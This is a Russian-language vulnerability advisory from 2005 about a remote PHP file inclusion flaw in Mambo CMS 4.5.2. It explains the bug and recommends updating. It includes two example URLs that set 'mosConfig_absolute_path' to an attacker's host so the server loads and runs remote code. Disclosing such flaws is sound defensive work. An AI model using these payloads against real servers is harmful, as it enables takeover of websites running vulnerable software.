php-инклюдинг в CMS Mambo

Дата публикации:
24.02.2005
Всего просмотров:
2207
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Mambo 4.5.2

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на уязвимой системе.

Уязвимость существует в сценарии '/includes/Archive/Tar.php' при обработке значения переменной 'mosConfig_absolute_path', которая должна указывать на местонахождение сценария '/includes/PEAR/PEAR.php'. Если на целевом сервере включена опция register_globals, удаленный пользователь может с помощью специально сформированного URL изменить значение переменной 'mosConfig_absolute_path' и выполнить произвольный код на системе с привилегиями web сервера. Примеры:

http://[target]/mambo/includes/archive/Tar.php?GLOBALS[mosConf ig_absolute_path]=http://[attacker]/

http://[target]/mambo/includes/archive/Tar.php?mosConfig_absolute_path=http://[attacker]/

URL производителя: http://mamboforge.net

Решение: Установите последнюю версию
http://mamboforge.net/frs/?group_id=5

или введите имя

CAPTCHA